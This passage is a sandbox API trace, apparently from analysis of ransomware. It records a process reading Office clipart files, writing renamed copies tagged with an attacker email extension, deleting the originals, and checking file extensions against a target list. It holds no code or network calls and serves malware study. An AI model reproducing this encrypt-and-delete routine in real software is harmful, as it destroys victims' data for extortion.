	[0141.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.604] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1736) returned 1
	[0141.604] CloseHandle (hObject=0x3cc) returned 1
	[0141.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf")) returned 0x20
	[0141.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.605] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.605] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0141.606] GetLastError () returned 0x0
	[0141.606] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x6c8, lpOverlapped=0x0) returned 1
	[0141.608] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x6d0, lpOverlapped=0x0) returned 1
	[0141.609] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.609] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.609] SetEndOfFile (hFile=0x3d0) returned 1
	[0141.610] CloseHandle (hObject=0x3d0) returned 1
	[0141.610] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.610] SetEndOfFile (hFile=0x3cc) returned 1
	[0141.612] CloseHandle (hObject=0x3cc) returned 1
	[0141.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.612] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf")) returned 1
	[0141.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.612] lstrlenW (lpString=".doc") returned 4
	[0141.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.612] lstrlenW (lpString=".docx") returned 5
	[0141.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.613] lstrlenW (lpString=".pdf") returned 4
	[0141.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString=".xls") returned 4
	[0141.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.613] lstrlenW (lpString=".xlsx") returned 5
	[0141.613] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.613] lstrlenW (lpString=".ppt") returned 4
	[0141.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.613] lstrlenW (lpString=".zip") returned 4
	[0141.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.613] lstrlenW (lpString=".rar") returned 4
	[0141.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString=".bz2") returned 4
	[0141.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString=".7z") returned 3
	[0141.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.613] lstrlenW (lpString=".dbf") returned 4
	[0141.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.613] lstrlenW (lpString=".1cd") returned 4
	[0141.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.613] lstrlenW (lpString=".jpg") returned 4
	[0141.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.613] lstrlenW (lpString=".doc") returned 4
	[0141.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.613] lstrlenW (lpString=".docx") returned 5
	[0141.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.614] lstrlenW (lpString=".pdf") returned 4
	[0141.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.614] lstrlenW (lpString=".xls") returned 4
	[0141.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.614] lstrlenW (lpString=".xlsx") returned 5
	[0141.614] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.614] lstrlenW (lpString=".ppt") returned 4
	[0141.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.614] lstrlenW (lpString=".zip") returned 4
	[0141.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.614] lstrlenW (lpString=".rar") returned 4
	[0141.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.614] lstrlenW (lpString=".bz2") returned 4
	[0141.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.614] lstrlenW (lpString=".7z") returned 3
	[0141.614] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.614] lstrlenW (lpString=".dbf") returned 4
	[0141.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.614] lstrlenW (lpString=".1cd") returned 4
	[0141.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63
	[0141.614] lstrlenW (lpString=".jpg") returned 4
	[0141.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.614] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.614] lstrlenW (lpString="BL00261_.WMF") returned 12
	[0141.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.615] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=12482) returned 1
	[0141.615] CloseHandle (hObject=0x3cc) returned 1
	[0141.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 0x20
	[0141.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.615] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.615] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0141.616] GetLastError () returned 0x0
	[0141.616] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x30c2, lpOverlapped=0x0) returned 1
	[0141.850] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x30d0, lpOverlapped=0x0) returned 1
	[0141.852] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.852] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.852] SetEndOfFile (hFile=0x3d0) returned 1
	[0142.264] CloseHandle (hObject=0x3d0) returned 1
	[0142.264] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.264] SetEndOfFile (hFile=0x3cc) returned 1
	[0142.476] CloseHandle (hObject=0x3cc) returned 1
	[0142.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 1
	[0142.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.511] lstrlenW (lpString=".doc") returned 4
	[0142.511] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString=".docx") returned 5
	[0142.511] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.511] lstrlenW (lpString=".pdf") returned 4
	[0142.511] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString=".xls") returned 4
	[0142.511] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.511] lstrlenW (lpString=".xlsx") returned 5
	[0142.511] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.511] lstrlenW (lpString=".ppt") returned 4
	[0142.511] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.511] lstrlenW (lpString=".zip") returned 4
	[0142.511] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.511] lstrlenW (lpString=".rar") returned 4
	[0142.511] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString=".bz2") returned 4
	[0142.511] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString=".7z") returned 3
	[0142.511] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.511] lstrlenW (lpString=".dbf") returned 4
	[0142.511] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.511] lstrlenW (lpString=".1cd") returned 4
	[0142.511] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.511] lstrlenW (lpString=".jpg") returned 4
	[0142.511] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.512] lstrlenW (lpString=".doc") returned 4
	[0142.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString=".docx") returned 5
	[0142.512] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.512] lstrlenW (lpString=".pdf") returned 4
	[0142.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString=".xls") returned 4
	[0142.512] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.512] lstrlenW (lpString=".xlsx") returned 5
	[0142.512] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.512] lstrlenW (lpString=".ppt") returned 4
	[0142.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.512] lstrlenW (lpString=".zip") returned 4
	[0142.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.512] lstrlenW (lpString=".rar") returned 4
	[0142.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString=".bz2") returned 4
	[0142.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString=".7z") returned 3
	[0142.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.512] lstrlenW (lpString=".dbf") returned 4
	[0142.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.512] lstrlenW (lpString=".1cd") returned 4
	[0142.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63
	[0142.512] lstrlenW (lpString=".jpg") returned 4
	[0142.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.513] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.513] lstrlenW (lpString="BL00524_.WMF") returned 12
	[0142.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.513] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6996) returned 1
	[0142.513] CloseHandle (hObject=0x3a8) returned 1
	[0142.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 0x20
	[0142.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.514] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.514] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.514] GetLastError () returned 0x0
	[0142.514] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1b54, lpOverlapped=0x0) returned 1
	[0142.535] WriteFile (in: hFile=0x31c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1b60, lpOverlapped=0x0) returned 1
	[0142.537] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.537] WriteFile (in: hFile=0x31c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.537] SetEndOfFile (hFile=0x31c) returned 1
	[0142.537] CloseHandle (hObject=0x31c) returned 1
	[0142.537] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.537] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.539] CloseHandle (hObject=0x3a8) returned 1
	[0142.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.560] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 1
	[0142.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.560] lstrlenW (lpString=".doc") returned 4
	[0142.560] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.560] lstrlenW (lpString=".docx") returned 5
	[0142.560] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.561] lstrlenW (lpString=".pdf") returned 4
	[0142.561] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString=".xls") returned 4
	[0142.561] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.561] lstrlenW (lpString=".xlsx") returned 5
	[0142.561] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.561] lstrlenW (lpString=".ppt") returned 4
	[0142.561] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.561] lstrlenW (lpString=".zip") returned 4
	[0142.561] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.561] lstrlenW (lpString=".rar") returned 4
	[0142.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString=".bz2") returned 4
	[0142.561] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString=".7z") returned 3
	[0142.561] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.561] lstrlenW (lpString=".dbf") returned 4
	[0142.561] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.561] lstrlenW (lpString=".1cd") returned 4
	[0142.561] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.561] lstrlenW (lpString=".jpg") returned 4
	[0142.561] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.561] lstrlenW (lpString=".doc") returned 4
	[0142.561] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.561] lstrlenW (lpString=".docx") returned 5
	[0142.561] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.561] lstrlenW (lpString=".pdf") returned 4
	[0142.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.562] lstrlenW (lpString=".xls") returned 4
	[0142.562] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.562] lstrlenW (lpString=".xlsx") returned 5
	[0142.562] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.562] lstrlenW (lpString=".ppt") returned 4
	[0142.562] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.562] lstrlenW (lpString=".zip") returned 4
	[0142.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.562] lstrlenW (lpString=".rar") returned 4
	[0142.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.562] lstrlenW (lpString=".bz2") returned 4
	[0142.562] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.562] lstrlenW (lpString=".7z") returned 3
	[0142.562] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.562] lstrlenW (lpString=".dbf") returned 4
	[0142.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.562] lstrlenW (lpString=".1cd") returned 4
	[0142.562] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63
	[0142.562] lstrlenW (lpString=".jpg") returned 4
	[0142.562] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.562] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.562] lstrlenW (lpString="BL00526_.WMF") returned 12
